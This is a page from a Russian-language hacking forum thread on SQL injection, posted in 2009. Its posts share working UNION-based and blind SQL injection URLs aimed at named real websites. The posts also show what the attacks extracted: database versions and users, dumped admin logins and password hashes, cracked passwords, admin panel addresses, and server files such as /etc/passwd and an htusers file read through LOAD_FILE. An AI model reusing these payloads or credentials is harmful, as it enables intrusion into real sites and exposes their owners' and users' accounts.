SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.eurosfaire.prd.fr/news/consulter.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    Database Version : 4.0.24_Debian-10sarge3-log
    Database name : eurosfaire
    User name : eurosfaire@granit


    ----------------------------------------------------------+

    Code:
    http://www.poker-carredas.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11--

    Database Version : 4.0.25-standard-log
    Database name : pokercar
    User name : [email protected]


    ----------------------------------------------------------+

    Code:
    http://fr.apa.az/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version() ,database(),user()),4,5,6,7,8,9,10,11,12,13--
    Database Version : 5.0.67-community
    Database name : apaadm_fr
    User name : apaadm_user@localhost
     
    #7841 f1ng3r, 18 Feb 2009
    Last edited: 18 Feb 2009
    1 person likes this.
  2. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.stroyportal.su/production.php?comp_id=-4740+union+select+concat_ws(0x3a,user(),database(),version())--
    stroyportal@localhost:stroyportal:4.1.22-log
    PR:5
    ТиЦ:425

    p.s вывод инфы в title.
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.ior.ro/produse/index.php?kCtg=9&ID=-48+union+select+1,2,3,4,5,6,7,convert(concat_ws(0x3a,version(),database(),user())+using+binary),9,0--




    Version : 4.1.11-Debian_4sarge7-log
    Database : dbior
    User : ior@localhost
     
  4. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://doska.minsk-in.net/showit.php?podrobnoid=5416%27+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/*


    Version : 4.1.22-log
    Database : minskin9_new
    User : minskin9_admin@localhost


    http://www.ourkids.net/news/article.php?nid=50%27+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+limit+1,1/*

    Version : 4.1.20
    Database : News
    User : webuser@localhost
     
    #7844 M.W.N.N., 18 Feb 2009
    Last edited: 18 Feb 2009
  5. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    research.ohiou.edu
    Code:
    http://www.research.ohiou.edu/index.php?section=5&page=-230+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14/*
    DB_Ver:4.1.19-log
    DB_User:[email protected]
    DB:vpresearch
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    blind

    http://www.mimteam.ro/index.php?page=3&cat=44+AND+ASCII(SUBSTRING((select+user()),1,1))>80






    Version : 5.0.67-community
    Database : rmim3903_mimteam
    User : rmim3902@localhost
     
  7. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    QWERTY cms lite
    http://lacoste-house.org.ua/index.php?act=cat&id=-3+UNION+SELECT+1,2,3,4,concat(pass459khyf,0x3a,secret873ktlW)+from+rkh8t5po
    bpS4B1mq:z56Ntrtlkjbgnticlg1
    реальный логин:пароль
    admin:bpS4B1mq
    Админка:
    http://lacoste-house.org.ua/admin/index.php
    =
    Таже кмс:
    http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
    admin:paLz5C9qm1

    http://apeu.org.ua/?id=-3+UNION+SELECT+1,2,3,4,5,6/*
    5.0.41
    user> name:pass
    yyedit:tylj27.hf
    admin> username:password
    Невывело

    И еще 2 левые скулины:
    www.letradecanciones.biz/index.php?search=artistname&id=-3003+UNION+SELECT+1
    www.ngo-perspektiva.org.ua/?type=page&id=-3+UNION+SELECT+1,2,3,4,5,6
     
    1 person likes this.
  8. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10--
    [email protected]:5.0.67:b23474
    PR:1
    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+limit+0,1--
    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--
    gold:569874123

    p.s/ админку ненашел,а точнее толком неискал
    p.s.s вобще студия делает сайты на дырявой cms,там админка во всех по адресу /admin
     
    1 person likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.flightweb.com/filemgmt/singlefile.php?lid=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-log
     
    _________________________
    2 people like this.
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.tabeleelectronice.ro/detail.php?id=-701+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18&idcat=138





    Database Version: 4.1.22-standard
    Database name: radu_tabele
    User name: radu_cips@localhost
     
    1 person likes this.
  11. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://www.trade.gov.cn/selloffers.php?cid=272+union+select+1,2,version(),4,5,6,7,8,9,10

    Database Version: 5.0.45-log
    Database name: trade_ec_b2b_export
    User name: [email protected]
     
  12. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    cfs.bc.ca - PR6
    Code:
    http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
    DB_Ver:5.0.45-log
    DB_User:cfsbc_2005@localhost
    DB:cfsbc_2005
    Админка:
    Code:
    http://www.cfs.bc.ca/admin/
    прочитал все что было мне в бд доступно, но пользователей не нашел :(

    =========================================================================

    cjsf.ca - PR5
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
    DB_Ver:5.1.28-rc
    DB_User: php@localhost
    DB:cjsfsite
    mysql.user
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9+from+mysql.user--
    root:474b96d173b7c3b8
    Читаем /etc/passwd
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9--
    Админка тут(но как видим basic аторизация)
    Code:
    http://www.cjsf.ca/admin/
    Сейчас поправим наше положение =) мы знаем где админка и знаем что нужно посмотреть где находится файл с паролями, а он в свою очередь прописан в .htaccess:
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7,8,9--
    Видим что наш файл по адресу:
    /usr/local/etc/apache22/htusers
    Читаем:
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f6574632f61706163686532322f68747573657273),2,3,4,5,6,7,8,9--
    И видим:
    cjsf:E4DngOk3FmdhI
    Вроде все =)
     
    #7852 Kraneg, 18 Feb 2009
    Last edited: 18 Feb 2009
    2 people like this.
  13. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    PR - 6

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    Database Version : 5.0.45
    Database name : wawwd_main
    User name : wawwd_main@localhost


    берем юзверей:

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a ,id,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+iLogin+limit+0,1--
    и админа:

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a, id,admin_user_name,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+nmail_admin+limit+0,1--
    админку не нашёл :mad:
     
  14. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PageRank = 7


    Microsoft SQL Server 2005 - 9.00.3282.00 (X64) Aug 5 2008 00:48:00 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1


    Current database is : EmpowerCMS


    Current User : webmaster







    Microsoft SQL Server 2000 - 8.00.2050 (Intel X86)
    Mar 7 2008 21:29:56
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)





    Db Name : EMS



    Current User : ODBC_User
     
    #7854 spherics, 19 Feb 2009
    Last edited: 19 Feb 2009
    2 people like this.
  15. R3b

    R3b New Member

    Joined:
    19 Jan 2009
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,null,null,concat_ws(0x20,user(),database(),version()),null,null,null,null,null,null,null,null,null,null/*
     
  16. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11,12%20from%20information_schema.tables--
    (все таблицы)


    Code:
    http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12%20from%20auth-- 
    (админские данные)


    Code:
    http://islamnasledie.ru/admin
    (Админка)



    admin:269b9cbb1485e341 (Логин:П ароль)

    PS: Че за кодировка у пароля?? Подскажите пожалуйста. С меня +
     
    1 person likes this.
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.petazon.com/cat.php?niccer=124+union+select+1,22222,3,4,5,66666,7,8,9999,10,11+limit+1,1/*

    Database Version: 4.0.27-standard
    Database name: petazon_pet
    User name: petazon_pet@localhost

    http://www.pristinemodels.dk/page.php?id=-2+union+select+1,version(),3/*

    Database Version: 5.0.32-Debian_7etch8-log
    Database name: pristinemodels_
    User name: [email protected]


    2 Assembler

    хэш MySQL:269b9cbb1485e341:RoSin28
     
    #7857 Rubaka, 19 Feb 2009
    Last edited: 19 Feb 2009
    1 person likes this.
  18. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20group_concat(table_name)%20from%20information_schema.t
    
    ables--
    (все таблцы, смотреть исходный код)

    Code:
    http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20concat_ws(0x3a,ID,username,realname,email,password)%20
    
    from%20mantis_user_table--
    (Админские данные)

    Code:
    http://www.ttfinance.ru/admin.php
    (Админка)

    1:administrator::[email protected]:074eec0da3d9dcc8e6e8df8cfe566050 (расшифровать не смог)

    PR=5
    ТиЦ=200

    Rubaka, спс репу позже поставлю, щас не могу =)
     
  19. B1ade

    B1ade Elder - Старейшина

    Joined:
    25 Apr 2008
    Messages:
    40
    Likes Received:
    20
    Reputations:
    16
    4.1.22-standard
    4.0.27-standard
     
    1 person likes this.
  20. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Version: 5.0.45
    User: mtsmith@localhost
    Database: PDD


    root : 248c0cc52235aa89
     
    4 people like this.
Thread Status:
Not open for further replies.